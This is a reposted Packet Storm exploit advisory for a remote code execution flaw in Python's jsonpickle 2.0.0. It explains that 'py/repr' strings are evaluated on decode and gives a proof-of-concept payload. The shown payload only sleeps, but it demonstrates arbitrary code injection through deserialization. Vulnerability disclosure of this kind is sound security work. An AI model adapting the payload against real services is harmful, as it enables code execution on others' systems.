Python jsonpickle 2.0.0 Remote Code Execution ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on February 25th, 2021 📆 | 8624 Views ⚑


Python jsonpickle 2.0.0 Remote Code Execution ≈ Packet Storm

# Exploit Title: python jsonpickle 2.0.0 – Remote Code Execution
# Date: 24-2-2021
# Vendor Homepage:
# Exploit Author: Adi Malyanker, Shay Reuven
# Software Link:
# Version: 2.0.0
# Tested on: windows, linux

# Python is an open source language. jsonickle module is provided to convert objects into a serialized form,
# and later recover the data back into an object. the decode is used to undeserialize serialized strings.

# If malicious data is deserialized, it will execute arbitrary Python commands. It is also possible to make system() calls.
# the problem is in the inner function loadrepr function which eval each serialized string which contains “py/repr”.

# The vulnerability exists from the first version till the current version for backward compatibility. no patch is provided yet

# the payload was found during our research made on deserialization functions.

# the pattern should be :
# {..{“py/repr”:/}..}

# example:

malicious = ‘{“1”: {“py/repr”: “time/time.sleep(10)”}, “2”: {“py/id”: 67}}’

# the command on the server side
some_parameter = jsonpickle.decode(malicious)

Source link

Tagged with:

Leave a Reply